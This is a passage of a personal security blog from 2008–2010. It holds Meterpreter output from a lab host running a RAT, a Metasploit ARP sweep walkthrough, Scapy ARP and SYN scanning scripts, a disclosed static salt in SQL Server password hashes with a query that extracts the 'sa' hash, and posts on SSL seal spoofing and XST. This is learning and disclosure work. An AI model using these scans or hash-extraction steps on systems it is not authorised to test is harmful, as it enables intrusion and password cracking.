 3896  IEXPLORE.EXE      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Internet Explorer\IEXPLORE.EXE
 2988  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\IEXPLORE.EXE
 916   IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\IEXPLORE.EXE
 3448  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\iexplore.exe

Hmm.. Nothing really stands out.
For fun, I killed the server from the sharK SIN, and compare the process table without the RAT running:

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                          Path
 ---   ----              ----  -------  ----                          ----
 0     [System Process]                                               
 4     System            x86   0        NT AUTHORITY\SYSTEM           
 632   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 680   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 704   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 748   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 764   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 940   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 988   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1108  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1184  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1280  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1448  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1704  explorer.exe      x86   0        VIKTIM2\viktim                C:\WINDOWS\Explorer.EXE
 1860  msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 352   mqsvc.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqsvc.exe
 832   mqtgsvc.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\mqtgsvc.exe
 768   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 4032  sqlservr.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 4052  inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 4044  dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 3692  dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 3896  IEXPLORE.EXE      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Internet Explorer\IEXPLORE.EXE
 2988  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\IEXPLORE.EXE
 3364  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\iexplore.exe

If you can't see a difference between the 'infected' and 'not infected' states, it's because there's not much of one.
Here's the output from running the 'diff' command on the process tables:

 $ diff running notrunning
32,33c32
<  916   IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\IEXPLORE.EXE
<  3448  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\iexplore.exe
---
>  3364  IEXPLORE.EXE      x86   0        VIKTIM2\viktim                C:\Program Files\Internet Explorer\iexplore.exe

As you can see, it's pretty tough to tell that this host is compromised just based on that.

You could see that it was compromised in the network traffic perhaps, as the RAT communicates with its control center. However, if a standard port was being used for the comms (say, TCP/80 for example) it could be difficult to tell even then without looking at the actual packets to examine the data.

Like I said, this wasn't really something I just figured out, it was just a very nice, clearly defined example of it.

Finding Live Hosts on the Local Network Segment Using Metasploit

2010-03-04T00:01:00.009-05:00

I've been learning ruby of late, and one way I'm doing that is by tearing into Metasploit. This has a few nice benefits for me:

* I get to see real code, written by smart people
* I get to learn metasploit a lot better
* I get to figure out how to write my own modules for metasploit

Since I've got a couple of arp flood/sweep scripts I've written in both perl and python, I figured that'd be a decent place to start.

It turns out that metasploit has a module already to do this (arp_sweep.rb), so I started out by taking a look at it. At first, I thought it didn't do an active sweep, because it appeared to operate on a pcap file only. I tweeted a question to #metasploit about that, and was quickly informed by @hdmoore that the module does indeed work on the target network, I just needed to set the INTERFACE option.

At that point I realized I should probably stop relying on just the code, and start poking at things from within the console =)

First thing's first, the arp_sweep module relies on pcaprub. Because I'm using Ubuntu 9.10 (Karmic Koala) vs. something like Backtrack, this module was not already configured. I found a great post over at darkoperator.com which explained, among other things, how to get this working. Here are the steps I took:

From inside my metasploit svn trunk directory (~/src/svn/metasploit/framework3/trunk in my case), I ran the following:

   $ cd external/pcaprub
   $ ruby extconf.rb && make
   $ sudo make install

Note that you need to have the libpcap-dev package in order for the compile of pcaprub to work.

Once I had that done, I returned to the main trunk directory, and ran msfconsole as root (that last bit is important, the arp sweep must be run as root in linux as far as I can tell, due to the fact that the module puts the interface into promiscuous mode to capture the ARP replies):

root:~/msf# ./msfconsole 

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 528 exploits - 248 auxiliary
+ -- --=[ 196 payloads - 23 encoders - 8 nops
       =[ svn r8703 updated today (2010.03.03)

The next thing that happens when I load msfconsole is that a bunch of stuff I have set in my msfconsole.rc gets loaded. If you want more information on what that means, Mubix has a great introduction to metasploit rc files at his practical exploitation site. Here's what it looks like:

resource (/root/.msf3/msfconsole.rc)> color false
resource (/root/.msf3/msfconsole.rc)> setg RHOSTS 10.0.1.0/24
RHOSTS => 10.0.1.0/24
resource (/root/.msf3/msfconsole.rc)> setg RHOST 10.0.1.75
RHOST => 10.0.1.75
resource (/root/.msf3/msfconsole.rc)> setg LHOST 10.0.1.51
LHOST => 10.0.1.51

The LHOST setting reflects the IP address of my testing host, the RHOST setting is a victim host I have on my network specifically to attack, and the RHOSTS is my lab network. The color false is there for a few reasons, one of them being that I like transparent term windows and color text sometimes doesn't play well with that.

The next step is to load the arp_sweep module and check out what options it takes. The module is in the auxiliary tree within metasploit, and can be loaded like so:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   RHOSTS     10.0.1.0/24      yes       The target address range or CIDR identifier
   SHOST                       yes       Source IP Address
   SMAC                        yes       Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The number of seconds to wait for new data

You can see here some of the effects of the resource file that was loaded earlier, the RHOSTS option is already set for me. I need to set a couple of other things though to make this work, like the source IP address and MAC, as well as the aforementioned INTERFACE setting:

msf auxiliary(arp_sweep) > set SHOST 10.0.1.51
SHOST => 10.0.1.51
msf auxiliary(arp_sweep) > set INTERFACE wlan0
INTERFACE => wlan0

To set the SMAC option, I need to find the MAC address of my network adapter. Because I'm using wireless for my testing, I need to grab that information from the wlan0 interface. Fortunately, ifconfig provides this information. Even more fortunately, metasploit allows system commands to be run from within the console, so I can get this quite easily. :

msf auxiliary(arp_sweep) > ifconfig wlan0
[*] exec: ifconfig wlan0

wlan0     Link encap:Ethernet  HWaddr 00:1b:77:df:e9:ae  
          inet addr:10.0.1.51  Bcast:10.0.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21b:77ff:fedf:e9ae/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8229414 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12543574 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2582588276 (2.5 GB)  TX bytes:797473527 (797.4 MB)

Now that I have the MAC address (it's presented in the HWaddr string above), I can set the last option:

msf auxiliary(arp_sweep) > set SMAC 00:1b:77:df:e9:ae
SMAC => 00:1b:77:df:e9:ae

One more thing to change; I like to increase the thread count to keep things moving quickly:

msf auxiliary(arp_sweep) > set THREADS 20
THREADS => 20

Now I run show options once more to make sure the changes I made look right:

msf auxiliary(arp_sweep) > show options

Module options:

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   INTERFACE  wlan0              no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   RHOSTS     10.0.1.0/24        yes       The target address range or CIDR identifier
   SHOST      10.0.1.51          yes       Source IP Address
   SMAC       00:1b:77:df:e9:ae  yes       Source MAC Address
   THREADS    20                 yes       The number of concurrent threads
   TIMEOUT    500                yes       The number of seconds to wait for new data

And then I can run the module:

msf auxiliary(arp_sweep) > run

[*] 10.0.1.1 appears to be up.
[*] 10.0.1.2 appears to be up.
[*] 10.0.1.5 appears to be up.
[*] 10.0.1.18 appears to be up.
[*] 10.0.1.49 appears to be up.
[*] 10.0.1.50 appears to be up.
[*] 10.0.1.75 appears to be up.
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Excellent! I got a nice list of live hosts on the local network segement using ARP.

I'll talk about why this is useful (over something like tcp portscanning the local network) in a blog post soon.

[edit]
I should mention by the way: if you wanted to do this outside of metasploit, you could do something like the following:

$ for i in `seq 0 254`; do sudo arping -I wlan0 -c1 -f 10.0.1.$i; done |grep Unicast

The results aren't nearly as pretty (nor are they as quickly gotten):

Unicast reply from 10.0.1.1 [00:0E:08:ED:A8:B1]  2.028ms
Unicast reply from 10.0.1.2 [00:15:62:FF:D6:06]  1.248ms
Unicast reply from 10.0.1.5 [00:20:00:38:20:6C]  2.548ms
Unicast reply from 10.0.1.18 [00:1D:73:A4:0A:AD]  1.182ms
Unicast reply from 10.0.1.49 [00:1F:3C:CD:50:1C]  1.652ms
Unicast reply from 10.0.1.50 [00:21:97:47:6C:80]  1.766ms
Unicast reply from 10.0.1.75 [00:02:55:42:08:0D]  1.203ms

SQL Server 2005 (and 2008) Static Salt

2010-03-02T19:49:00.010-05:00

While performing a database security review for a client, I noticed that the password hashes for the 'sa' user in the master.sys.sql_logins table all had the same salt. This was true on 4 separate SQL server instances across 4 different hosts.

Naturally, this piqued my curiousity, so I proceeded to investigate on as many SQL Server 2005 instances as I could get my hands on, and found that the salt was the same across the board.

To expound a bit:
If you run the following SQL statement:

SELECT password_hash FROM master.sys.sql_logins WHERE name = 'sa'

the whole password hash looks something like this:

0x01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21

The way that value breaks down is like so:

0x         : this is a hex value (the column is of type varbinary)
0100       : "throw away" constant bytes
4086CEB6   : the hash salt

the remainder of the value is the hashed password value.

Since we're only interested in bytes 3 - 6, we can use the SQL SUBSTRING() function to pull the part we care about like so:

  SELECT SUBSTRING(password_hash,3,4) AS sa_hash_bytes
  FROM master.sys.sql_logins WHERE name = 'sa';

On each SQL Server instance I tested, the salt was the same
(0x4086CEB6)

This was true across Service Packs, and differing versions of both the DBMS platform as well as OS.

Here's the output from 'SELECT @@version' on my test instances (minus the date and copyright):

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 6.0 (Build 6001: Service Pack 1)

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
 Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
 Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

I did some checking to see if this was a known issue, and was unable to find either an article/post describing this, nor an individual in the industry that had heard about it.

While this isn't a "sexy" BoF or anything, it does leaves SQL server administrative passwords open to password cracking (eg. by using a precomputed table of SHA1 hashes using the static known salt, one can dramatically decrease the time it takes to crack an sa user password...on any SQL Server 2005 or 2008 instance.) Additionally, once a password has been acquired, it may be possible to use that same password in other locations on a network if the administrators use a common password (or a common OS image for servers...).

The real risk this poses is fairly minor, since by default in the affected SQL Server versions normal users lack access to the column containing the password hash. However, there are a great deal of applications out there which use privileged accounts to access the database back end they use; and there are an even greater number of applications which contain SQL Injection vulnerabilities. In my mind, there's likely to be a fair amount of overlap in those 2 vectors, which would then leave a system potentially exposed to exploitation through this method.

Accordingly I decided to contact Microsoft. (I'll leave discussion about Full Disclosure for some other post) I have to say, it was pretty decent working with the MSRC, they were quite competent and very forthcoming. Whatever else can be said about Microsoft, it's clear that they have come a long way in dealing with vulnerabilities, which I am very happy to report.

The end result of all this is a Microsoft KB Article that explains more about the issue, along with some workarounds. According to that article, this will be fixed in SQL Server service packs at some point.

For those that are curious, the entire process took less than 3 months (I first reported the issue to Microsoft on December 11, 2009.) In my opinion, that's an acceptable time frame for a large company to address what is an admittedly minor security issue, particularly given the fact that there are a number of major (and minor) holidays which take place in that time span.

playing with ruby

2010-03-01T22:49:00.005-05:00

i started playing around with ruby recently.
one of the first things i figured i'd do is muck about with sockets.
it turns out that's brain dead easy with ruby, which i was happy to discover.
here's a quick and dirty whois client i whipped up as a way to learn the syntax etc.

require "socket"

rr = Array.new
whoisrv = "whois.arin.net"
port = "43"
qry = "208.105.198.137"

s = TCPSocket.open(whoisrv, port)
s.puts(qry)
while rr = s.gets
   puts rr
end
s.close

Maltego, Technorati, and Creative Commons Licensing Failure

2009-09-18T14:59:00.004-04:00

I've been using Paterva's Maltego software quite a bit lately in my testing. This software is a fantastic tool, and provides a great way to obtain a great deal of information about an organization or individual. It comes in two flavors, a community edition which is free, and a commercial edition which is not. Because I am using this for my job, I have the commercial version of Maltego.

Like I said, Maltego is a fantastic tool, but there's one thing that bugs me about it; A number of the most interesting transforms that come with the product use the Technorati search engine to provide information about an entity (for those that don't know, Technorati is a search engine that pulls information from the blogosphere and various social networks).

The problem is that the Technorati search engine uses the Creative Commons license for its technology, and they chose to go with the one that disallows commercial use.

That's fine, it's their code, they can license it however they want. My problem isn't so much with them, as with Paterva for choosing to use their stuff in the Maltego product. Because I am hired by clients to perform this discovery, I am unable to use these transforms in Maltego (at least, as far as my understanding of the licensing goes) and so I have them disabled.

"So what?" you may ask. Well, what this means is that attackers using the free version of Maltego can get potentially useful information about a given company which a tester hired by the company, using the paid version of Maltego, can't legally provide. (I should mention here that I have tried looking into whether Technorati provides a way to license their technology for commercial use, and as far as I can tell, there is no way to do so.)

This strikes me as insane, and not a GoodThing(tm) at all.

twitter badness?

2009-03-23T00:26:00.005-04:00

so, a few days ago i was working on a project, and noticed that GoDaddy allows web sites which use their SSL certificates to post a flashie thing on their website allowing visitors to check the status of the cert. (see the bottom of tweepme.com for an example).

It turns out that GoDaddy actually has the blank certificate image stored on their servers, and that it is accessible via http in addition to https.

This means it could easily be used for spoofing by anyone that knows how to:
a) manipulate an image in an image editing software application or
b) manipulate an image in any number of programming languages

So, I decided to make the following tweet at twitter:

"interesting. if you know how to manipulate images, you too can spoof godaddy's SSL seal: http://is.gd/o1pM"

It was posted, and then disappeared about 15 minutes later.
I reposted it. Half an hour later, it was gone again.

So I talked to a friend of mine that follows me on twitter and had him pull up my page in his browser, and also in his third party application on a mobile device. I then posted again. He confirmed that it showed on my twitter profile page, but that it didn't hit his feed, nor his mobile device. About half an hour later, it disappeared again.

I then posted a tweet about the fact that my tweets were going missing for some reason. That also vanished about 20 minutes after posting.

So, I posted a tweet about something completely unrelated, that stayed.

At that point, I sent a request into twitter support asking whether I was triggering their ToS violation or such and that this was leading to my tweets vanishing. As yet (3 days later), it's not even been assigned to anyone to review. It can be found on their site.

Hmm... Interesting.

[edit]
apparently the link above only works if you are logged in, and even then may only work for the submitter of the ticket. here's a screenshot:

network upgrade!

2009-03-03T14:47:00.003-05:00

I've been wanting to upgrade to business class Road Runner for some time, but haven't had the chance to do so until now. There's a lot of reasons behind my wanting to do this, some of them are:

static IP addresses are only available via Road Runner's business class offering

while download speeds are the same or less than residential, upload speed is significantly higher (on paper)

the residential cable modem I have only works at 10M half duplex for the 'client' side interface, which means while i run a gig-e or 100M full network in my home, I'm throttled to that at my uplink.

So, I put the call in, got the quote, signed it, and sent it back.
2 days later and I have a shiny new modem. But even better, I have this:

Bandwidth Thoughput from MyHouse to Various Places

rochester, ny (http://rochester.speedtest.frontiernet.net/)
   down - 7.013 Mbps
   up - 1.415 Mbps


los angeles, california (http://lax.speedtest.dslextreme.com/speed.php)
   down - 4.505 Mbps
   up - 1.385 Mbps


san francisco, california (http://helpme.att.net/dsl/speedtest/)
   down - 8.782 Mbps
   up - 1.460 Mbps


dallas, texas (http://www.gospeedtest.com/index.html)
   down - 4.075 Mbps
   up - 0.854 Mbps

ASNCheck Script

2009-03-03T01:15:00.009-05:00

While working on a project today I decided that it would be handy to have a script that could take an AS number (from stdin or from a list of them) and check the health status of it (via things like DNSBL for example), specifically gathering information that could lead one to determine the relative infection/compromise level.

Ideally, such a script would be able to alternatively take an IP address, determine the AS for it and then report on both the IP provided as well as the overall "health" of the AS associated with it.

Well, some of that I managed to whip out tonight, though not all.

I'll keep working on this, but I think it's useful enough now to warrant posting (I normally do *not* make code public in this raw a state, so take note that there are very likely bugs in this).

That said, here's 'asncheck.py'.
In its current state, it just returns a list of IP addresses from a given AS which are in the dShield current watchlist.

#! /usr/bin/env python
# ------------------------------------------------
# asncheck:
# retrieves the current dshield watchlist for
# a given AS, returning just the IP addresses. 
# sample url:
# https://secure.dshield.org/asdetailsascii.html?as=123
# ------------------------------------------------
# written by:
# jason ross (algorythm@gmail.com)
# ------------------------------------------------
import sys

def main():
   # here beginneth the script
   opts = parmsdealer()

   if (opts.verbose == 1):
      print "\nRetrieving information for AS Number " + opts.asn + ":\n"
    
   if (opts.infile):
      try:
         filedata = open(opts.infile, 'rU')
      except IOError:
         print "unable to open input file \'" + opts.infile + "\'\n"
         sys.exit(1)
      except:
          print "Unexpected error:", sys.exc_info()[0]
          sys.exit(1)
      else:
         for line in filedata:
            print line
            asn = line.split(opts.delim, 3)[int(opts.col)]
    
   if (opts.asn):
      asn = opts.asn

   dshield(asn, opts.verbose)

   #print '{0}.{1}.{2}.{3}'.format(oct1.zfill(3),oct2.zfill(3),oct3.zfill(3),oct4.zfill(3))


def parmsdealer():
   import sys
   from optparse import OptionParser
   version="\nasncheck: version 0.1\nauthor: jason ross \n"
   usage="\n\n%prog [OPTIONS]\n"
   parser = OptionParser(usage=usage, version=version)
   
   # set up command line arguments
   parser.set_defaults(col=0)
   parser.set_defaults(delim="|")
   parser.set_defaults(verbose=0)
    
   parser.add_option("-v", "--verbose", dest="verbose",
                     action="store_true", help="turn on/off verbosity (default: off)")
   parser.add_option("-a", "--asn", dest="asn",
                     action="store", help="specify the AS to retrieve data for (just the number, or with 'AS' prepended)")
   parser.add_option("-f", "--infile", dest="infile",
                     action="store", help="get the AS from the specified file (can be a list)")
   parser.add_option("-c", "--col", dest="col",
                     action="store", help="[required with -f] specifies which column in an input file contains the AS (default is to use the first column: '0')")
   parser.add_option("-d", "--delim", dest="delim",
                     action="store", help="[required with -f] specifies the delimiter to use when parsing the input file (default is to use the ASCII pipe character (0x7c):  '|')")
                     
   # process command line arguments
   (options, args) = parser.parse_args()
   
   # exit if we're missing options
   if (not options.asn and not options.infile):
      print "\n" + sys.argv[0] + ": missing parameter(s)\n"
      parser.print_help()
      print "\n"
      sys.exit(1)
    
   # exit if we've got conflicting options
   if (options.asn and options.infile):
      print "\n" + sys.argv[0] + ": can't set both an asn and an input file (there can be only one!)\n"
      parser.print_help()
      print "\n"
      sys.exit(1)

   return options


def dshield(asn, verbose):
   import socket
   import urllib
   import urllib2
   import re
    
   # urllib2 calls socket, so we can set the timeout here
   timeout = 5
   socket.setdefaulttimeout(timeout)

   baseuri = 'https://secure.dshield.org/asdetailsascii.html'

   params = {}
   params['as'] = asn
   encparams = urllib.urlencode(params)

   requri = baseuri + '?' + encparams
   req = urllib2.Request(requri)

   if (verbose == 1):
      print "opening " + requri + "\n"

   try:
      res = urllib2.urlopen(req)
   except urllib2.URLError, e:
      if hasattr(e, "code"):
         print "site borked! HTTP error: " 
         print e.code
      elif hasattr(e, "reason"):
         print "server borked! reason: "
         print e.reason
   else:
      data = res.readlines()
#      print data
      for line in data:
         if ( re.match(r"[0-9]", line) ):
            ip = line.split()
            print ip[0]
      

if __name__ == "__main__":
   main()

ARP Ping Using Scapy

2009-01-21T23:48:00.005-05:00

here's a quick script i whipped up a while ago.
it uses scapy to perform an ARP ping of a network, and provides a CSV report of any MAC addresses it finds, along with the associated IP's.

It requires tcpdump to be installed and in the $PATH, as well as root privs to run.

#!/usr/bin/env python
# note that this script requires tcpdump to be installed
# additionally, it requires root privs to run.

import sys
if len(sys.argv) != 2:
    print "Usage: pingarp \n  eg: pingarp 192.168.1.0/24"
    sys.exit(1)

from scapy import srp,Ether,ARP,conf
conf.verb=0
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]),
              timeout=2)

print r"MAC,IP"
for snd,rcv in ans:
    print rcv.sprintf(r"%Ether.src%,%ARP.psrc%")

here's sample output:

$ sudo ./pingarp 192.168.11.0/24
MAC,IP
00:16:01:8b:54:4a,192.168.11.1
00:13:ce:e9:6e:95,192.168.11.3
00:40:ca:8a:72:48,192.168.11.6

crappy blogger templates

2009-01-20T23:09:00.003-05:00

i'm going to have to consider either writing my own template, or moving to another blog technology.
every one of the default templates sucks for posting code, or any other long string of text for that matter. there's a lot more i could complain about, but that single fact at the moment is bugging me.

so, i've switched to a very basic template, and added the following bit of css to the code for now:


.post pre, .post code {
 overflow: auto;
}

this works, but is less than ideal i think. not sure there's a good answer, but i'm definitely going to start looking into one. for now, sorry for the ugly layout, but hey, if it's that bad, RSS ftw! ;-)

Scapy Notes

2009-01-20T22:50:00.003-05:00

Scapy is an "interactive packet manipulation program" written in python. It basically is a packet workshop framework which allows one to craft their own packets from scratch to match a variety of protocols, then send them on the wire and capture the results for analysis. Since it is written in python, it allows one to essentially create any number of tools, including scanners, fuzzers, DoS tools, etc. More info on it can be found at the scapy home page.

Basic Usage
When scapy is run from the command line, it loads the scapy modules and then drops you at the python shell prompt. This is useful for a number of reasons, but primary among them is that this means anything you can do in python, you can do in scapy as well. For the moment though, we're going to focus solely on the scapy specific modules.

Building a Packet
Scapy makes it extremely easy to build a packet, here's what it looks like:

First, we call scapy interactively:

[root@snsvc]# scapy
Welcome to Scapy (v1.1.1 / f88d99910220)
>>>

Next, we create the IP frame, then the TCP packet:

>>> a=IP()
>>> b=TCP()

Now we combine the two to create the TCP/IP datagram:

>>> c=a/b

We can use scapy's ls command to view the contents of the packet:

>>> ls(c)
version    : BitField             = 4               (4)
ihl        : BitField             = None            (None)
tos        : XByteField           = 0               (0)
len        : ShortField           = None            (None)
id         : ShortField           = 1               (1)
flags      : FlagsField           = 0               (0)
frag       : BitField             = 0               (0)
ttl        : ByteField            = 64              (64)
proto      : ByteEnumField        = 6               (0)
chksum     : XShortField          = None            (None)
src        : Emph                 = '127.0.0.1'     (None)
dst        : Emph                 = '127.0.0.1'     ('127.0.0.1')
options    : IPoptionsField       = ''              ('')
--
sport      : ShortEnumField       = 20              (20)
dport      : ShortEnumField       = 80              (80)
seq        : IntField             = 0               (0)
ack        : IntField             = 0               (0)
dataofs    : BitField             = None            (None)
reserved   : BitField             = 0               (0)
flags      : FlagsField           = 2               (2)
window     : ShortField           = 8192            (8192)
chksum     : XShortField          = None            (None)
urgptr     : ShortField           = 0               (0)
options    : TCPOptionsField      = {}              ({})

Changing Packet Details
Now, if we want to change any of the fields in the packet, we can do so by altering their values. For example, to change the IP destination to 192.168.1.1 and set the TCP destination port to 443, we do the following:

>>> a.dst='192.168.1.1'
>>> b.dport=443

Now we recreate the TCP/IP packet again, and view the changes using ls:

>>> c=a/b
>>> ls(c)
version    : BitField             = 4               (4)
ihl        : BitField             = None            (None)
tos        : XByteField           = 0               (0)
len        : ShortField           = None            (None)
id         : ShortField           = 1               (1)
flags      : FlagsField           = 0               (0)
frag       : BitField             = 0               (0)
ttl        : ByteField            = 64              (64)
proto      : ByteEnumField        = 6               (0)
chksum     : XShortField          = None            (None)
src        : Emph                 = '192.168.1.3'   (None)
dst        : Emph                 = '192.168.1.1'   ('127.0.0.1')
options    : IPoptionsField       = ''              ('')
--
sport      : ShortEnumField       = 20              (20)
dport      : ShortEnumField       = 443             (80)
seq        : IntField             = 0               (0)
ack        : IntField             = 0               (0)
dataofs    : BitField             = None            (None)
reserved   : BitField             = 0               (0)
flags      : FlagsField           = 2               (2)
window     : ShortField           = 8192            (8192)
chksum     : XShortField          = None            (None)
urgptr     : ShortField           = 0               (0)
options    : TCPOptionsField      = {}              ({})

Note that even though we didn't change the IP source, the value has changed. This is because scapy determined which interface would be used to send the packet to the destination we configured, and changed the source to that interface's address for us. We can override this if desired.

Sending the Packet
We use the sr() function to send the data across the wire. This function sends the packet, sniffs the response, and matches sent packets with the received responses. It works at layer 3, and will return the whole result of a probe.

>>> sr(c)
Begin emission:
...Finished to send 1 packets.
*
Received 4 packets, got 1 answers, remaining 0 packets
(, )

Viewing Results
We can view the results by assigning them to variables:

>>> res,unans=_
>>> res.nsummary()
0000 IP / TCP 192.168.1.3:ftp_data > 192.168.1.1:https S ==> IP / TCP 192.168.1.1:https > 192.168.1.3:ftp_data SA / Padding

Here we see we sent a SYN packet to port 443, and received a SYN/ACK packet back from the destination. We also see there was some Padding added to the SYN/ACK. We can view the information in the padding by accessing the results list directly:

>>> res[0][1]
>>

Scripted Usage
Because scapy is written in python, it can be used from within any python script simply by using the import scapy statement.
For example, here's a simple script to perform a TCP SYN scan of ports 0-1024 on a given host (provided as a parameter to the script):

#!/usr/bin/env python
import sys
from scapy import sr,IP,TCP,conf
conf.verb = 0
dstip = sys.argv[1]

print "\nBeginning scan of "+dstip
res,unans = sr(IP(dst=dstip)/TCP(dport=[(0,1024)]),timeout=1)
if res:
   print "\nReceived answers from the following ports:\n"
   for s,r in res:
      print r.sprintf("%TCP.sport%")
print "\nScan completed\n"

And here's the results of running this:

[root@snsvc]# ./scanner 192.168.1.1

Beginning scan of 192.168.1.1

Received answers from the following ports:

telnet
http
https

Scan completed

Install/Config Notes
"Error during evauluation of config file"
When running scapy from inside other python scripts, you may encounter the following error message:

ERROR: Error during evaluation of config file [None]
Traceback (most recent call last):
File "/usr/lib/python2.4/site-packages/scapy.py", line 12183, in read_config_file
execfile(configfile)

Not very helpful, but easy to fix. The problem is that scapy is looking for a config file which doesn't exist. The good news is that one just has to be present, no configuration is required. To fix this, simply do the following:

# touch ~/.scapy_startup.py

Using the Loopback Interface
The loopback interface is a special interface, in that packets going through it are not really assembled and dissassembled. The kernel routes the packet to its destination while it is still stored an internal structure.

In order to use the loopback interface, you need to send your packets using PF_INET/SOCK_RAW instead of PF_PACKET/SOCK_RAW. This can be done by changing the supersocket used by scapy, which is accessed via the configuration.

The default scapy values for sockets are as follows:

+------------------------+----------------+
| Configuration Variable | Default Value  |
+------------------------+----------------+
| L2listen               | L2ListenSocket |
+------------------------+----------------+
| L2socket               | L2Socket       |
+------------------------+----------------+
| L3socket               | L3PacketSocket |
+------------------------+----------------+

To use the loopback interface, change the L3socket setting to L3RawSocket.
This can be done using the following command (either via the scapy CLI or inside a script):

conf.L3socket=L3RawSocket

captcha madness

2009-01-04T23:37:00.004-05:00

i went to gmail today to login to an older email account i haven't checked in a while... apparently *too* long, because i got presented a captcha upon entering the username and password.

i was having a hard time reading the text (no surprises there, captcha's really suck as a technology), so for fun i decided to try clicking the "handicap" icon so i could listen to the captcha in audio format.

for some reason, it's never occurred to me that, just as visual captcha uses random crap in the image to try to prevent OCR from determining the letters, the audio version would contain a whole lot of noise in an effort to prevent text to speech from doing the same.

if you've ever wondered what an audible version of the mass confusion that is a modern captcha file might sound like: here you go.

all i can say is, it's a good thing i can see.

full disclosure just blew past my lunacy limit

2008-11-20T15:44:00.006-05:00

from this thread on the list:

From: n3td3v
Date: Thu, 20 Nov 2008 20:27:01 +0000

n3td3v is real

On Thu, Nov 20, 2008 at 8:23 PM, wrote:
> The mustache respectfully disagrees with you, for
> the very first time.
>
> - -al
>
>
> On Thu, 20 Nov 2008 15:17:24 -0500 n3td3v
> wrote:
>>
>> im not a sock puppet im real.
>>
>> On Thu, Nov 20, 2008 at 8:16 PM,
>> wrote:
>>> *Two* sock puppets, and a dumb *old* guy
>>> with a unkempt mustache.

AJAX Fun

2008-11-19T23:47:00.022-05:00

A little snippet of code I'm playing with. This started as me learning more about XST, to understand why TRACE being enabled was considered a BadThing(tm). [see: this white paper (.pdf format) for more on that].

In my opinion, the best way to learn is to do, so I quickly whipped up the following so I could play, and handily, this finally gives me a good reason to write my first bit of AJAX even =)

A couple of points:

If you change the method from GET to HEAD, this makes a handy banner grabber

